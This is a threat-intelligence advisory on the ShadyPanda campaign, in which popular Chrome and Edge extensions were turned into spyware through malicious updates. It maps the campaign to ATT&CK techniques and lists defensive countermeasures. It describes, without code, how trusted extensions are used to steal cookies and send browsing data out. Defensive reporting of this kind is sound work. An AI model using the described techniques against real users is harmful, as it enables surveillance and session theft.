ShadyPanda’s Hidden Malware Network Infects Over 4 Million Browsers
VTA-004543 – ShadyPanda’s Hidden Malware Network Infects Over 4 Million Browsers
A new investigation by Koi Security has exposed a massive, long-running espionage and monetization campaign using browser extensions. The operation, known as ShadyPanda, has manipulated Chrome and Edge extensions into spyware and back-door tools, ultimately infecting over 4.3 million users worldwide.
The campaign evolved through distinct phases. Initially, ShadyPanda pushed mass-distribution wallpaper or productivity extensions, embedding affiliate fraud and passive tracking to monetize users’ clicks and browsing activity. Over time, the threat matured into more aggressive forms of control, such as search hijacking and cookie theft, where keystrokes and search queries were intercepted and manipulated. The decisive phase came when ShadyPanda weaponized extensions that had accumulated hundreds of thousands of installs, pushing malicious updates to execute arbitrary scripts with full browser privileges. This enabled real-time surveillance, including collecting every URL visited, browser fingerprinting and activity timestamps, all encrypted and sent to servers in China.
What distinguishes ShadyPanda’s campaign is the long-term strategy of building trust and massive user bases through legitimate-looking extensions, then deploying malware invisibly via trusted update mechanisms. Their service workers can modify network traffic, intercept credentials, hijack sessions and inject malicious content even into HTTPS connections.
Presently, ShadyPanda’s largest operation remains active with 4 million infected Edge browser users through extensions masquerading as productivity tools, continuing extensive spying and data collection early.
Severity:
Medium
Attack Surface:
Others, Supply Chain (Third-party vendors), Web Browser
Tactics:
Collection, Command and Control, Defense Evasion, Discovery, Execution, Exfiltration, Initial Access, Persistence, Resource Development
Techniques:
T1584 – Acquire Infrastructure
T1195.002 – Supply Chain Compromise
T1204.002 – User Execution: Malicious File
T1204.005 – User Execution: Malicious Library
T1059.007 – JavaScript Execution
T1036 – Masquerading
T1566 – Social Engineering
T1005 – Data from Local System
T1539 – Steal Web Session Cookie
T1041 – Exfiltration Over C2 Channel
T1571 – Non-Standard Port
T1119 – Automated Collection
T1056.001 – Input Capture
References:
1. https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign
Indicator of Compromise:
1. https://otx.alienvault.com/pulse/692e512d2503374907819007
SuperPRO’s Threat Countermeasures Procedures:
1.Disable risky browser extension auto-updates. Configure Chrome Enterprise Policy ExtensionSettings to restrict update URLs to trusted domains only.
2.Enforce extension allow-listing. Use chrome (ExtensionInstallAllowlist) and Edge (ExtensionInstallAllowlist)
3.Monitor for suspicious extension behavior. Use browser telemetry tools to detect extensions loading remote JavaScript (eval, Function()), extensions communicating with unknown domains and sudden permission escalation after updates.
4.Set strict outbound firewall rules. Block unknown dynamic DNS, malicious C2-style traffic and extensions communicating with IPs outside expected SaaS ranges
5.Enforce Browser Isolation / Application Guard.
Contributed by: Thivya